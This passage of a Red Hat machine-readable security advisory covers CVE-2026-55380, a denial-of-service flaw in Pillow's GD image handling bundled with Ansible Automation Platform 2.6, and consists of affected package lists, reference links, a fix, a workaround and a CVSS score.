"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-55380"
},
{
"category": "external",
"summary": "RHBZ#2497455",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497455"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-55380",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-55380"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-55380",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55380"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/f39b0ae6624eb2d7c5c5d651d9bb5fdbd96a8675",
"url": "https://github.com/python-pillow/Pillow/commit/f39b0ae6624eb2d7c5c5d651d9bb5fdbd96a8675"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-phj9-mv4w-65pm",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-phj9-mv4w-65pm"
}
],
"release_date": "2026-07-06T18:50:14.789000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:56:41+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50336"
},
{
"category": "workaround",
"details": "Avoid processing untrusted GD 2.x image files with PIL.GdImageFile.open(). Use Image.open() instead, which includes decompression bomb protections for supported formats. If GdImageFile must be used, validate the image dimensions before calling load(). Restricting accepted image formats at the application boundary to only those explicitly needed can reduce exposure.",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
